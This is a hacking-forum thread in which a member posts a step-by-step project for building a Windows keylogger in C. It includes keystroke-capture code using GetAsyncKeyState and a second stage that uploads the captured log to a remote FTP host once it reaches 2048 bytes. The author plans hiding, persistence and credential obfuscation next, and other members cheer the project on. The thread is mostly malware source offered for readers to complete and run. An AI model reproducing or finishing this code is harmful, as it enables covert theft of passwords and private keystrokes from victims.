Members Online
Total Online: 38 Web Spiders: 13
Guests Online: 33
Members Online: 5
Registered Members: 70199 Newest Member: deeznuts
|
View Thread
| Author |
Keylogger Development Project |
stdio
Member
Posts: 375
Location: omnipresent
Joined: 06.04.08
Rank: God |
|
So Ive decided to do something a bit different. Instead of just a guide or submitting working code to the code bank, Im going to try and include as many people that want to take part.
The goal of this project is to familiarize people with c and the msdn libraries, it a hopefully fun and interactive way.
Ive written a basic outline of how to log keys using GetAsyncKey. It does not currently work (well it does but I wont post it all). Then I left instructions on usage and to do's for you to fix/add.
The first part Ive kept as simple as possible, (ie, you dont need to worry about pointers in this part), and hopefully commented where necessary. Note: It doesnt follow a perfectly sync logic structure as I tried to show a few different ways to capture keys. Note this should be easy.
Anywho:
Tasks:
*Build a main function and link to the GetKey function.
*Add additional functionality with extra keys.
*Compile and run
Notes: Win XP 32 dev c++ 4.9.9.2 compiled it.
pastebin code
http://pastebin.com/m1c84a696
#include <stdio.h>
#include <windows.h>
#include <winuser.h>
extern FILE *out_file;
/*
stdio's keylogger v.01
Compiled on Dev-C++ 4.9.9.2 WinXP 32 Bit
Key Debounce Line ***Just FYI***
while(GetAsyncKeyState(character)==-32768){}
MSDN KEY CODES
http://msdn.microsoft.com/en-us/library/ms927178.aspx
GetAsyncKeyState MSDN Reference
http://msdn.microsoft.com/en-us/library/ms646293(VS.85).aspx
To do: Add Numpad Support, Fnums support, Punctuation.
To use: Build a main function and link to this code.
*/
int GetKey()
{
short character;
Sleep(30);
/*ALPHA CHARACTERS V_KEY*/
for (character=0x41;character <= 0x5A;character++)
{
if (GetAsyncKeyState(character)==-32768)
{
out_file = fopen("data.log","a+");
/*UPPERCASE*/
if (GetAsyncKeyState(VK_LSHIFT) || GetAsyncKeyState(VK_LSHIFT))
{
while(GetAsyncKeyState(character)==-32768){}
fputc(character, out_file);
fclose(out_file);
}
/*LOWERCASE*/
else
{
while(GetAsyncKeyState(character)==-32768){}
fputc(character+0x20, out_file);
fclose(out_file);
}
}
}
/*Numerical Row*/
for (character=0x30;character <= 0x39;character++)
{
if (GetAsyncKeyState(character)==-32768)
{
out_file = fopen("data.log","a+");
/*Map Keys to Special Characters*/
if (GetAsyncKeyState(VK_LSHIFT) || GetAsyncKeyState(VK_RSHIFT))
{
while(GetAsyncKeyState(character)==-32768){}
switch(character)
{
case(0x31):
fputs("!", out_file);
fclose(out_file);
break;
case(0x32):
fputs("@", out_file);
fclose(out_file);
break;
case(0x33):
fputs("#", out_file);
fclose(out_file);
break;
case(0x34):
fputs("$", out_file);
fclose(out_file);
break;
case(0x35):
fputs("%", out_file);
fclose(out_file);
break;
case(0x36):
fputs("^", out_file);
fclose(out_file);
break;
case(0x37):
fputs("&", out_file);
fclose(out_file);
break;
case(0x38):
fputs("*", out_file);
fclose(out_file);
break;
case(0x39):
fputs("(", out_file);
fclose(out_file);
break;
case(0x30):
fputs(")", out_file);
fclose(out_file);
break;
default:
fputs("Error\n", out_file);
fclose(out_file);
break;
}
}
/*Defaulted Numbers*/
else
{
while(GetAsyncKeyState(character)==-32768){}
fputc(character, out_file);
fclose(out_file);
}
}
}
/* Catch Single Special Keys */
if (GetAsyncKeyState(VK_ESCAPE))
{
while(GetAsyncKeyState(VK_RETURN)==-32768){}
out_file = fopen("data.log","a+");
fputs("[ESC]", out_file);
fclose(out_file);
}
if (GetAsyncKeyState(VK_SPACE))
{
while(GetAsyncKeyState(VK_SPACE)==-32768){}
out_file = fopen("data.log","a+");
fputs(" ", out_file);
fclose(out_file);
}
if (GetAsyncKeyState(VK_RETURN))
{
while(GetAsyncKeyState(VK_RETURN)==-32768){}
out_file = fopen("data.log","a+");
fputs("\n", out_file);
fclose(out_file);
}
if (GetAsyncKeyState(VK_TAB))
{
while(GetAsyncKeyState(VK_TAB)==-32768){}
out_file = fopen("data.log","a+");
fputs("[TAB]", out_file);
fclose(out_file);
}
if (GetAsyncKeyState(VK_BACK))
{
while(GetAsyncKeyState(VK_BACK)==-32768){}
out_file = fopen("data.log","a+");
fputs("[BACK]", out_file);
fclose(out_file);
}
return 0;
}
I will update it with different things to do (hiding, persistence, sockets, etc) and add it here when I feel like it. Maybe a day or a month ... who knows.
I'm sorry, I cant hear you over the sound of how awesome I am!
Edited by stdio on 24-01-10 03:08 |
 
|
| Author |
RE: Keylogger Development Project |
stdio
Member
Posts: 375
Location: omnipresent
Joined: 06.04.08
Rank: God |
|
LEVEL 2
First I would like to hear feedback -- positive/negative/indifferent/easy/hard/interesting/boring/etc. If many people just dont care either way Ill stop.
Now for part 2
Ive added a few functions that send logs over ftp when the file size hits 2048 Bytes (~ 1 page)
Hopefully if you are following along you have a main funtion that records keys to a file.
So heres what you get this time.
Objectives are again stated in file but for some redundancy here they are again
[*]Use the MSDN reference [url]http://msdn.microsoft.com/en-us/library/aa384180(VS.85).aspx[/url] to fill in missing parameters
[*]set up an ftp server or use a free web host (x10hosting is the one I used)
[*]Find wininet compile flag (wont compile without it)
[*]Update main function accordingly (I have provided a flowchart that my program follows)
[*]Compile and run
http://pastebin.com/m1ccbcd69
#include <stdio.h>
#include <wininet.h>
#include <time.h>
/*Part 2
Sending logs
fill in the missing details using
http://msdn.microsoft.com/en-us/library/aa384180%28VS.85%29.aspx
find the linker compile flag for wininet wont compile without it
Use program flow provided and update main function accordingly.
*/
int SendLogs();
int TimeStamp();
extern FILE *out_file;
/*Declare Time Variables*/
struct tm *local;
time_t t;
/*Send Logs over FTP using wininet*/
int SendLogs()
{
t = time(NULL);
local = localtime(&t);
HINTERNET hInternet;
HINTERNET hConnect;
HINTERNET lRes;
bool pass;
hInternet = InternetOpen(NULL,INTERNET_OPEN_TYPE_DIRECT,NULL,NULL,0);
hConnect = InternetConnect(hInternet,"<ftphost>",INTERNET_DEFAULT_FTP_PORT,"what goes here?", "what goes here?", INTERNET_SERVICE_FTP,0,0);
pass = FtpPutFile(hConnect,"data.log",asctime(local),/*Find correct transfer type*/,0);
InternetCloseHandle(hConnect);
InternetCloseHandle(hInternet);
if(pass==false)return 1; //If send fails, it will loop again, Not clearing the Log
TimeStamp(); // If sends start new log with Time Stamp
return 0;
}
/*Send on file size > 2048 Bytes (~1page) */
int CheckSize()
{
int size;
out_file = fopen("data.log","<how should we open this??>");
fseek(out_file, 0L, SEEK_END);
size = ftell(out_file);
fseek(out_file, 0L, SEEK_SET);
fclose(out_file);
if (size > 2048)
{
SendLogs();
return 1; //debugging will stop keylogger after 1 send
}
return 0;
}
/*Time Stamps Log file, and Clears Current Content */
int TimeStamp()
{
t = time(NULL);
local = localtime(&t);
out_file=fopen("data.log", "w+");
fputs("------Start Logging Time ------\n", out_file);
fputs(asctime(local), out_file);
fputs("-------------------------------\n\n", out_file);
fclose(out_file);
return 0;
}
At this point you should have a basic logger that sends data ofter ftp to your host.
UPCOMING TASKS:
simple string encryption so username/passwords/ftphosts arent plainly available under a debugger.
Runtime CRC (cyclic redundancy check) & and fail function
I'm sorry, I cant hear you over the sound of how awesome I am! |
|
|
| Author |
RE: Keylogger Development Project |
stealth-
Member
Posts: 998
Location: Eh?
Joined: 10.04.09
Rank: God |
|
This sounds like a great project, but unfortunately I don't know C right now  . As for those who do know C, not sure why they don't seem interested.....
The irony of man's condition is that the deepest need is to be free of the anxiety of death and annihilation; but it is life itself which awakens it, and so we must shrink from being fully alive.
http://www.stealth-x.com |
|
|
| Author |
RE: Keylogger Development Project |
skathgh420
Member
Posts: 418
Location: 127.0.0.1
Joined: 03.03.08
Rank: God |
|
This is great stdio! I did the same thing to check the file size using fseek() an ftell(). Seeing as I'm completely unfamiliar with sockets for windows I just used cURL for the ftp upload part. Can't wait to see how hiding the password/username is done aswell as the CRC.
 |
  
|
| Author |
RE: Keylogger Development Project |
bl4ckc4t
Member
Posts: 591
Location: /etc/
Joined: 07.03.06
Rank: HBH Guru |
|
|
This is pretty nice, I would say. Gives a simplicity that C doesn't usually have. |
|
|
|
|
|
Main:
